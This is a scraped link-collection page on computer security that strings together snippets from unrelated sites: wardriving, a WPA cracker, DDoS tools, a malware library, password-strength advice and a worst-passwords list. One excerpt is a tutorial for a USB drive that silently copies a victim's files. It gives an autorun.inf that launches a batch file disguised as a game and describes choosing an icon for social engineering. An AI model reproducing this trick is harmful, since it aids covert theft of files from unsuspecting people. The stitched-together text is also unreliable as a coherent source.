background preloader

Security

Facebook Twitter

Wireless LAN Security / Wardriving / WiFi Security / 802.11. TrueCrypt - Free Open-Source On-The-Fly Disk Encryption Software for Windows 7/Vista/XP, Mac OS X and Linux. Index of / WPA CRACKER. Black Hat ® Technical Security Conference // Home. Darknet - The Darkside | Ethical Hacking, Penetration Testing & Computer Security. Distributed Denial of Service (DDoS) Attacks/tools. Hack a Day. How to make flash drive that copy's users files silently and automatically. Ok there is no order in the file creation process just that you have all files created and on the flash drive. I will start out with the autorun.inf. This file is used when you insert the flash drive into said computer.

Also used to change the thumb drive icon to something more acceptable for social engineering. Here is the code, you will have to open a simple word editor such as word, you can past this code into word and edit to your hearts content. [autorun] icon=drive.icoopen=launch.bataction=Click ok to Run game for Windowsshell\open\command=launch.bat a couple of notes the code is between the lines not the lines at all so dont put them in your autorun file. also when you save this file after editing or pasing this in the editor make shure you save it as all files and put a .inf after it... like this autorun.inf look at pic two if you have any issues.

You can change the icon to your tastes what you will have to do is find a .png a png file is an icon file. I-Hacked.com Taking Advantage Of Technology. List of Free Proxy Servers - Page 1 of 8. Security Digest. Features In a world that seems to be losing the notion of journalism, Liquidmatrix Security Digest remains committed to long form articles that dig into the major issues affecting the industry with Feature articles. Click for Features >>>>> Briefings When you don’t know what you’re looking for, Liquidmatrix Security Digest helps you find the most important information quickly with our regular briefings. Click for Briefings >>>>> Podcasts Liquidmatrix Security Digest is where you’ll find the industry’s best podcast, delivering more information than you thought was possible while wasting only an hour of your time.

Click for Podcasts >>>>> /dev/everything And when you feel like you just can’t get enough, Liquidmatrix Security Digest is happy to hand you the firehose and let you drink all you want from our /dev/everything feed. Click for /dev/everything… The USB Lockpick - Hack Any Password. The Usability of Passwords (by @baekdal) #tips. Security companies and IT people constantly tells us that we should use complex and difficult passwords. This is bad advice, because you can actually make usable, easy to remember and highly secure passwords.

In fact, usable passwords are often far better than complex ones. So let's dive into the world of passwords, and look at what makes a password secure in practical terms. Update: Read the FAQ (updated January 2011) Update - April 21, 2011: This article was "featured" on Security Now, here is my reply! How to hack a password The work involved in hacking passwords is very simple. Asking: Amazingly the most common way to gain access to someone's password is simply to ask for it (often in relation with something else). When is a password secure? You cannot protect against "asking" and "guessing", but you can protect yourself from the other forms of attacks.

The measure of security must then be "how many password requests can the automated program make - e.g. per second". Like these: It takes: Welcome to VX Heavens! (VX heavens) Library (VX heavens) What’s My Pass? What’s My Pass? » The Top 500 Worst Passwords of All Time. From the moment people started using passwords, it didn’t take long to realize how many people picked the very same passwords over and over. Even the way people misspell words is consistent. In fact, people are so predictable that most hackers make use of lists of common passwords just like these. To give you some insight into how predictable humans are, the following is a list of the 500 most common passwords.

If you see your password on this list, please change it immediately. Keep in mind that every password listed here has been used by at least hundreds if not thousands of other people. There are some interesting passwords on this list that show how people try to be clever, but even human cleverness is predictable.

“…Approximately one out of every nine people uses at least one password on the list shown in Table 9.1! Lists the top 500 worst passwords of all time, not considering character case. Source: Perfect Passwords, Mark Burnett 2005.